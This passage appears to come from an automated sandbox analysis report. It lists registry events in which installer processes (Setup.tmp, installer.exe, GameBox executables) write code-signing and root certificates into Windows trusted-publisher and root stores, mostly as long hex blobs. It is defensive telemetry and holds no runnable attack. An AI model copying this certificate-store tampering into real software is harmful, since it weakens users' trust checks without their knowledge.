16041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-9L90V.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\jctrnkq0.13m\installer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e5c0000000100000004000000001000002000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-B06BN.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 | 